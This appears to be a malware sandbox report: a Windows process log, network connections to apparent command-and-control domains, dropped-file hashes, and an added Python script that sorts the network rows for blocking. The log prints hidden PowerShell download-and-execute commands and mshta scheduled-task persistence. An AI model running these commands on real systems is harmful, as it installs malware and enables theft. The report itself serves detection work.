"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5356,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5064 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff95bb846f8,0x7ff95bb84708,0x7ff95bb84718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2008 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2512 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2928 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3276 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3272 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3204 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3204 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3448 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3860 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe
"C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn EVGXOmaAU0L /tr "mshta C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn EVGXOmaAU0L /tr "mshta C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd" any_word
C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE
"C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE"
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "XgBsCma2dsa" /tr "mshta \"C:\Temp\ILvKar5Uh.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\ILvKar5Uh.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe
"C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe
"C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe"
C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe
"C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe"
C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe
"C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe
"C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe"
C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe
"C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe"
C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe
"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"
C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe
"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"
C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe
"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"
C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe
"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2236 -ip 2236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 964
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\ProgramData\eltqgcf\oamb.exe
C:\ProgramData\eltqgcf\oamb.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe
"C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe"
C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | calmingtefxtures.run | udp |
| US | 172.67.158.171:443 | calmingtefxtures.run | tcp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 104.21.48.1:443 | foresctwhispers.top | tcp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 104.21.74.230:443 | tracnquilforest.life | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 172.67.166.247:443 | collapimga.fun | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| US | 172.67.166.247:443 | collapimga.fun | tcp |
| US | 172.67.166.247:443 | collapimga.fun | tcp |
| RU | 185.215.113.115:80 | 185.215.113.115 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 172.217.23.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| NL | 142.250.179.202:443 | ogads-pa.googleapis.com | udp |
| NL | 172.217.168.206:443 | apis.google.com | udp |
| NL | 142.250.179.202:443 | ogads-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.39.110:443 | play.google.com | udp |
| NL | 142.251.39.110:443 | play.google.com | tcp |
| NL | 142.251.39.110:443 | play.google.com | udp |
| NL | 142.251.39.110:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| NL | 142.250.179.129:443 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | pirtyoffensiz.bet | udp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 8.8.8.8:53 | hobbyedsmoker.live | udp |
| US | 8.8.8.8:53 | dsfljsdfjewf.info | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | decreaserid.world | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | disobilittyhell.live | udp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| N/A | 127.0.0.1:9229 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| RU | 185.215.113.115:80 | 185.215.113.115 | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| N/A | 127.0.0.1:9229 | tcp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| RU | 185.215.113.115:80 | 185.215.113.115 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| DE | 104.194.157.122:80 | 104.194.157.122 | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | decreaserid.world | udp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 8.8.8.8:53 | hobbyedsmoker.live | udp |
| US | 8.8.8.8:53 | dsfljsdfjewf.info | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 172.67.158.171:443 | calmingtefxtures.run | tcp |
| US | 104.21.48.1:443 | foresctwhispers.top | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.74.230:443 | tracnquilforest.life | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 8.8.8.8:53 | presentymusse.world | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | boltetuurked.digital | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 8.8.8.8:53 | hobbyedsmoker.live | udp |
| US | 8.8.8.8:53 | presentymusse.world | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | boltetuurked.digital | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 8.8.8.8:53 | pirtyoffensiz.bet | udp |
| US | 8.8.8.8:53 | dsfljsdfjewf.info | udp |
| US | 8.8.8.8:53 | decreaserid.world | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| DE | 93.186.202.3:4000 | towerbingobongoboom.com | tcp |
| DE | 93.186.202.3:5111 | towerbingobongoboom.com | tcp |
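The network rows above mix three different things: DNS lookups sent to the sandbox resolver (8.8.8.8:53), TCP connections that actually completed, and direct-to-IP connections with no hostname at all. The following script is an added triage example, not output of the sandbox or code from the report: it parses rows in the report's `| Country | Destination | Domain | Proto |` format and buckets each host as DNS-only, non-standard-port, or direct-IP. The row format is taken from the page; the classification rules, the resolver address and the "common port" set are the author's assumptions. The sample rows are copied from the table above.

```python
"""Triage sandbox 'Network' rows: separate DNS lookups from connections.

Added example, not part of the original report. The row layout is taken
from the page; the heuristics (RESOLVERS, COMMON_PORTS, the buckets) are
the author's own assumptions.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: rows copied from the report's Network table.
SAMPLE_ROWS = """\
| US | 104.21.48.1:443 | foresctwhispers.top | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 93.186.202.3:4000 | towerbingobongoboom.com | tcp |
| DE | 93.186.202.3:5111 | towerbingobongoboom.com | tcp |
"""

RESOLVERS = {"8.8.8.8"}        # assumption: the sandbox's DNS server
COMMON_PORTS = {80, 443}       # assumption: ports not worth flagging on their own
_IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


@dataclass
class HostSummary:
    domain: str
    lookups: int = 0                               # DNS queries seen for this name
    endpoints: set = field(default_factory=set)    # (ip, port) pairs actually connected
    countries: set = field(default_factory=set)

    @property
    def dns_only(self) -> bool:
        """Queried via DNS but never connected to."""
        return self.lookups > 0 and not self.endpoints

    @property
    def odd_ports(self) -> set:
        """Ports connected to that are outside COMMON_PORTS."""
        return {port for _ip, port in self.endpoints if port not in COMMON_PORTS}

    @property
    def direct_ip(self) -> bool:
        """The 'Domain' column is itself an IPv4 address (no hostname)."""
        return _IPV4.fullmatch(self.domain) is not None


def parse_rows(text):
    """Yield (country, ip, port, domain, proto) for each well-formed row."""
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or ":" not in cells[1]:
            continue                        # header row or malformed row
        country, dest, domain, proto = cells
        proto = proto.lower()
        if proto not in ("tcp", "udp") or not domain:
            continue
        ip, port = dest.rsplit(":", 1)
        yield country, ip, int(port), domain, proto


def summarize(text):
    """Group rows by domain; a UDP/53 hit on a resolver counts as a lookup."""
    hosts = {}
    for country, ip, port, domain, proto in parse_rows(text):
        host = hosts.setdefault(domain, HostSummary(domain))
        if ip in RESOLVERS and port == 53 and proto == "udp":
            host.lookups += 1
        else:
            host.endpoints.add((ip, port))
            host.countries.add(country)
    return hosts


def triage(text):
    """Return the three review buckets as sorted domain lists."""
    hosts = summarize(text)
    return {
        "dns_only": sorted(d for d, h in hosts.items() if h.dns_only),
        "odd_ports": sorted(d for d, h in hosts.items() if h.odd_ports),
        "direct_ip": sorted(d for d, h in hosts.items() if h.direct_ip),
    }


if __name__ == "__main__":
    for bucket, domains in triage(SAMPLE_ROWS).items():
        print(f"{bucket:10s} {', '.join(domains) or '-'}")
```

The DNS-only bucket is the one that is easy to under-block: a name that was queried but never connected to either did not resolve at detonation time or resolved to something the sandbox did not log, yet it is still part of the sample's configuration, so a rotating list like the one above should be blocked as a set rather than by the one or two hosts that answered. The odd-port bucket (here 93.186.202.3 on 4000 and 5111) and the direct-IP bucket (185.156.73.73:80) are the rows that will not be caught by DNS-based controls at all and need a network-layer rule. steamcommunity.com and github.com land in no bucket; the script deliberately does not judge whether traffic to a legitimate service is benign, because that needs the request content, not the connection table.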
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
| MD5 | 30e223a129babc795c38e7b6bb3ee202 |
| SHA1 | 99ac334d2de4224b19212f16922babfc0b424d92 |
| SHA256 | a971b93985a01d792963c3a7635eb2905487ba7dcf2623a4361907e1e82dcafe |
| SHA512 | e6e8eda28fc4c8359426749b9bd3ec51c5ea062b35349c4db6a1235cbbebcf41d947573961e85355468538fae3fa767d03de16b388ac18ba4b9ac8c08c2d7fec |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe
| MD5 | a92d6465d69430b38cbc16bf1c6a7210 |
| SHA1 | 421fadebee484c9d19b9cb18faf3b0f5d9b7a554 |
| SHA256 | 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77 |
| SHA512 | 0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe
| MD5 | 9e3110a7e155297b4a8b2324c31147d2 |
| SHA1 | cffe1b51d8579cefd79a74df881ac5529555525b |
| SHA256 | 5785fdaa656a4cb5b6fd42f528be1c3326ed92696b4c6e176779a5d4d2cc883f |
| SHA512 | 9cd222acd97169febeb98990fbae502aa99aade0f9b981ba8cd88f2c7a8b22a2cfcf3909f432a8ad532fdd19d4d4eb863b890460e15792a6fa4229dc762377e3 |
memory/836-28-0x0000000001000000-0x0000000001304000-memory.dmp
